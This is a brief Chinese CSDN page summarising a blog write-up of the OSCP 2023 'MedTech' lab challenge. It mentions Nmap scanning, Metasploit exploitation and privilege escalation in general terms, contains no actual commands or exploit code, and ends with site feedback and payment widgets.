OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全和网络渗透感兴趣的读者来说是一个很有价值的参考资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值